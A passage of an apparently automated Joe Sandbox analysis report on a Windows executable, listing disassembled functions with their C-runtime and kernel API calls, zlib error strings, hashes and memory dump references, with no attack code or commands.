                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A315E76608B8186EB609F60E8903EEB365FB84714F44403ADA8D57F95EF7CC548C724
                                                                                                                                                                                                                                                                    Function 00007FF7C2685C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685CB5
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268561C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C267A94F,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267A979
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C267A94F,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267A99E
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685CA4
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F1A
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F2B
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F3C
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C268617C), ref: 00007FF7C2685F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                    • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction ID: 153666d6b2b4f9493ebea2b2f4a0f6c92abdb3709e625c196cd5298ee007d9b1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD1B222A08242C5E720BF25D8811B9E792EF447A8FD18136DA8D67F95EFBCE451C770
                                                                                                                                                                                                                                                                    Function 00007FF7C267A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                    • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction ID: d2ca4c29434095923aee58e97aed98ed29ae930dede06a9d202c33ac9a3908df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA318336608B81C5DB60EF24E8502AEB3A1FB88764F940135EA9D57F54DF7CC555CB20
                                                                                                                                                                                                                                                                    Function 00007FF7C26818E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction ID: 804be66aa415fc0c0ff62cb65c4e5ee46f53693a4e57f48ce2c552bfb43b39a1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23B19322B18692C1EA61AF29A4001B9E352EB44BF4F845175DADD67F85EFBCE441C330
                                                                                                                                                                                                                                                                    Function 00007FF7C2685EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F1A
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F2B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268561C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F3C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268564C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C268617C), ref: 00007FF7C2685F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                    • Instruction ID: ae6500d5c2ae3bdb708ca43380b5aa46c654452a92e45c69f5a662011a7a9714
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E517022A08682C6E750FF21D9815A9E762FB487A4FC14136DA8D63F96DFBCE450C770
                                                                                                                                                                                                                                                                    Function 00007FF7C266D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                    • Instruction ID: f2dc8be60804aba7e7e03783625864d59ef83831a2eafb78f0fe85ca625819fa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC111F26B14B05C9EB00EF70E8552B973A4F719768F440E31DA9D96B64EFB8D164C360
                                                                                                                                                                                                                                                                    Function 00007FF7C2683C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                    • Instruction ID: 28415d86f2d5360ad3e54c048a095c04f03d89a0a33cd4c00f36c0d542203560
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7C1F472B18286C7D7249F19A04467AF7A2F794794F808135DB8E63B84DFBDE810CB50
                                                                                                                                                                                                                                                                    Function 00007FF7C266A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                    • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                    • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                    • Instruction ID: f04908ffd292f035b59bd06ef33535a7e5f82c285b6e6866116515b032110141
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F1D572A543C58BE795AF14C088B3EBAFAFF44750F454538DA8967B90CBB8E840C764
                                                                                                                                                                                                                                                                    Function 00007FF7C2689798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 15204871-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                    • Instruction ID: 01c2b1729d9357b9b2ec9a2e88113b03f8b0955ceecfc3cc400a1e956c673860
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13B18D73A05B89CBEB15CF29C84636C77A1F744B58F188821DA9E83BA4CF79D451C720
                                                                                                                                                                                                                                                                    Function 00007FF7C2673A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                                    • API String ID: 0-227171996
                                                                                                                                                                                                                                                                    • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                    • Instruction ID: a050d031d18a7f2591c43319060f3f1c5f030e40d956bb1ee921687e242aa015
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E1D83290864682EB68BF25A15013DB362FF55F64F940135DA8E27BD4DFA9D8E1C730
                                                                                                                                                                                                                                                                    Function 00007FF7C266A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                    • API String ID: 0-900081337
                                                                                                                                                                                                                                                                    • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                    • Instruction ID: e6d39984e9073f2c67297d79cd024b3718a18c70b45ad2c1199280f0a99b1e66
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE91CE72A142C687E7A49F15C448B3E76BAFF44360F554139DA8A66BC0CB7CE940CB74
                                                                                                                                                                                                                                                                    Function 00007FF7C267DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                                                    • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                    • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                    • Instruction ID: 2d931b8738c7dcea525e7aafa58621bd142f8c9d5c69d5f69a19852614db9800
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98516822B182C186E724EE35E801769AB92E744FA4F888231CBD857FC5CFBDE444C720
                                                                                                                                                                                                                                                                    Function 00007FF7C267DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                                                    • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                    • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                    • Instruction ID: 3de00cff6746158e9195a629f369a24f3d7b39f06c276904fb8450a2a63340d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A16666A087C586EB21EF25F0007A9BBD6AB61BE4F448431DE8D57B81DFBDE501C320
                                                                                                                                                                                                                                                                    Function 00007FF7C2678804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
